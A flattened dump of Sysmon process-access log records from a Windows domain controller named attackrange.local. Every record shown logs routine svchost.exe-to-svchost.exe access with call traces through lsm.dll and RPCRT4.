10341000x8000000000000000440977Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.070{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1200-00000000BA01}480C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440976Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.070{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440975Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.070{42DC5269-CE98-6086-0C00-00000000BA01}8405596C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440974Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.070{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1200-00000000BA01}480C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440973Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.070{42DC5269-CE98-6086-0C00-00000000BA01}8405596C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440972Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.069{42DC5269-CE98-6086-0C00-00000000BA01}8405596C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440971Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.069{42DC5269-CE98-6086-0C00-00000000BA01}8405596C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440970Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.069{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1200-00000000BA01}480C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440969Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.069{42DC5269-CE98-6086-0C00-00000000BA01}8405596C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1200-00000000BA01}480C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440968Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.069{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440967Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.068{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440966Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.068{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440965Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.068{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440964Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.068{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440963Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.068{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440962Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.067{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440961Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.067{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23e0b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440960Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.067{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440959Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.067{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1400-00000000BA01}1052C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440958Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.067{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1400-00000000BA01}1052C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440957Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.067{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1400-00000000BA01}1052C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440956Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.067{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440955Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.066{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440954Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.066{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440953Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 